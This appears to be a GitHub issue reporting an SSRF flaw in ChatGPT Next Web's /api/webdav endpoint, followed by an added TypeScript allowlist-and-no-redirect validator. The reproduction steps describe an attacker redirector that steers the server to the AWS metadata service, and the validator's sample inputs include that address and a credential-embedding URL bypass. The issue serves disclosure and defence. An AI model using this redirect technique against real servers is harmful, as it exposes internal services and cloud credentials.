[Bug] Release v2.11.3 Still Vulnerable to Full-Read SSRF CVE-2023-49785 #4380
Comments
Is it still affected with the latest commits (unreleased) c0c54e5?
Waiting for the info...
Haven't tested the latest, but from the code it appears to be affected. The attacker fully controls the endpoint the server reaches out to, and the server can be redirected back to arbitrary internal URLs.
I'll patch a separate version to disable redirects; @nvn1729, do you have any other suggestions?
Merged in #4381.
One approach is for the user to define an allowlist of webdav endpoints in server-side config, and the webdav API should only allow access to those specific endpoints. Disabling redirects helps, but it'll still leave the app vulnerable to blind SSRF.
We will solve this problem by whitelisting webdav endpoints |
Bug Description
The v2.11.3 release removed the /api/cors endpoint but added a new /api/webdav endpoint. This new endpoint is also vulnerable to full-read SSRF.
Steps to Reproduce
Let's call the attacker IP "attacker-ip", and the vulnerable ChatGPT Next Web target IP "target-ip".
An attacker would first set up an HTTP redirector on their IP. This redirector will respond to HTTP requests by returning an HTTP redirect with the Location header set to an endpoint in the internal network of the "target-ip".
For instance, let's say the redirector is running on port 46732 on the "attacker-ip" and it's set up to redirect to http://169.254.169.254/latest/meta-data (AWS metadata service).
Then the attacker makes a request to the webdav endpoint that looks like this:
The /api/webdav handler will fetch "http://attacker-ip:46732/a:/chatgpt-next-web/backup.json", which will then redirect to http://169.254.169.254/latest/meta-data, resulting in the attacker getting an output like this:
Expected Behavior
The right solution is to allow the user to configure the webdav URLs in server-side config, and for the application to only allow access to those URLs. Redirects could be disabled, but it'd still be vulnerable to blind SSRF.
Screenshots
No response
Deployment Method
Desktop OS
No response
Desktop Browser
No response
Desktop Browser Version
No response
Smartphone Device
No response
Smartphone OS
No response
Smartphone Browser
No response
Smartphone Browser Version
No response
Additional Logs
No response
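The mitigation proposed in this issue (a server-side allowlist of WebDAV endpoints, plus refusing to follow redirects) can be expressed in a small TypeScript module. The code below is an added example written for this page; it is not the project's code and not the fix merged in #4381. The environment variable name WEBDAV_ALLOWED_ENDPOINTS, the sample allowlist and the sample request URLs are all constructed for the example.

```typescript
// Added example (not the project's own code): server-side allowlist for the
// /api/webdav proxy.  The server only contacts an endpoint whose origin
// (scheme://host[:port]) is configured by the operator, and it never follows
// redirects, so an allowlisted host cannot bounce the server to internal URLs.

export interface EndpointDecision {
  allowed: boolean;
  reason: string;
}

// Parse the operator's configuration into a set of normalised origins.
// The variable name WEBDAV_ALLOWED_ENDPOINTS is an assumption of this example;
// its value is a comma-separated list of URLs such as "https://dav.example.com".
export function parseAllowlist(raw: string): Set<string> {
  const origins = new Set<string>();
  for (const entry of raw.split(",")) {
    const trimmed = entry.trim();
    if (trimmed === "") continue;
    try {
      const u = new URL(trimmed);
      // URL.origin drops default ports and the path, so
      // "https://dav.example.com:443/x" and "https://dav.example.com" agree.
      if (u.protocol === "http:" || u.protocol === "https:") origins.add(u.origin);
    } catch (_e) {
      // Unparseable configuration entries are ignored, never allowed.
    }
  }
  return origins;
}

// Decide whether a client-supplied endpoint may be fetched by the server.
export function checkWebdavEndpoint(endpoint: string, allowlist: Set<string>): EndpointDecision {
  let url: URL;
  try {
    url = new URL(endpoint);
  } catch (_e) {
    return { allowed: false, reason: "endpoint is not an absolute URL" };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { allowed: false, reason: `scheme ${url.protocol} is not http(s)` };
  }
  // "https://dav.example.com@evil.example/" parses with host evil.example;
  // reject embedded credentials outright rather than reasoning about them.
  if (url.username !== "" || url.password !== "") {
    return { allowed: false, reason: "credentials embedded in URL" };
  }
  if (!allowlist.has(url.origin)) {
    return { allowed: false, reason: `origin ${url.origin} is not allowlisted` };
  }
  return { allowed: true, reason: "origin is allowlisted" };
}

// fetch() options for the proxy: with redirect "manual" a 3xx answer is handed
// back unchanged instead of being followed, and isRedirect() lets the handler
// turn it into an error rather than a second outbound request.
export function webdavFetchInit(method: string) {
  return { method, redirect: "manual" as const };
}

export function isRedirect(status: number): boolean {
  return status >= 300 && status < 400;
}

// Constructed sample configuration and requests for a stand-alone run.
export const SAMPLE_CONFIG = "https://dav.example.com, http://nas.internal:5005/";
export const SAMPLE_REQUESTS = [
  "https://dav.example.com/chatgpt-next-web/backup.json",
  "http://nas.internal:5005/chatgpt-next-web/backup.json",
  "http://169.254.169.254/latest/meta-data",
  "https://dav.example.com@evil.example/backup.json",
  "ftp://dav.example.com/backup.json",
];

export function runSample(): EndpointDecision[] {
  const allowlist = parseAllowlist(SAMPLE_CONFIG);
  return SAMPLE_REQUESTS.map((r) => checkWebdavEndpoint(r, allowlist));
}

runSample().forEach((d, i) => {
  console.log(`${SAMPLE_REQUESTS[i]} -> ${d.allowed ? "ALLOW" : "DENY"} (${d.reason})`);
});
```

In a real handler the decision runs before any network call is made, and a denied request answers the client with a 4xx without the server ever contacting the supplied host; combining the allowlist with `redirect: "manual"` is what closes the blind-SSRF gap the thread mentions, since an allowlisted host could otherwise still redirect the server.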